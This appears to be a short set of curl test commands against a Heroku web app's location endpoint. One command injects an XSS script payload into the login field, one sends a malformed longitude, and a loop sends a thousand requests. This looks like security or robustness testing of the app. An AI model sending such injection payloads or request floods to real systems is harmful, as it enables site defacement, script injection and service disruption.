curl --data "login=patfitz&lat=42&lng=41" https://rocky-harbor-6569.herokuapp.com/sendLocation

curl --data "login=<script>alert('whatup');</script>&lat=42&lng=41" https://rocky-harbor-6569.herokuapp.com/sendLocation


curl --data "login=patfitz&lat=42&lng=tom" https://rocky-harbor-6569.herokuapp.com/sendLocation

for ((i=0; i<=1000; i++));
do
        curl --silent --data "login=patfitz"$i"&lat=42&lng=41&bob=tim" https://rocky-harbor-6569.herokuapp.com/sendLocation > /dev/null
done



curl --silent --data "login=patfitz"$i"&lat=42&lng=41&bob=tim" https://rocky-harbor-6569.herokuapp.com/sendLocation > /dev/null


